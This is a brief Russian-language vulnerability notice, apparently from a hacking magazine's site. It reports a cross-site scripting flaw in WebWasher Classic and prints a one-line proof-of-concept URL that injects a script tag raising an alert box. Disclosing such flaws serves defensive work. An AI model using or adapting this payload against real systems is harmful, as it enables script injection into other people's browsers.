Рекомендуем почитать:


Хакер #315. Positive Hack Days Fest 3
Программа: WebWasher Classic WebWasher Classic
Уязвимость обнаружена в WebWasher Classic. Удаленный пользователь может выполнить XSS нападение.
Эксплоит:
http://localhost:8080/<script>alert("WASH_ME")</script>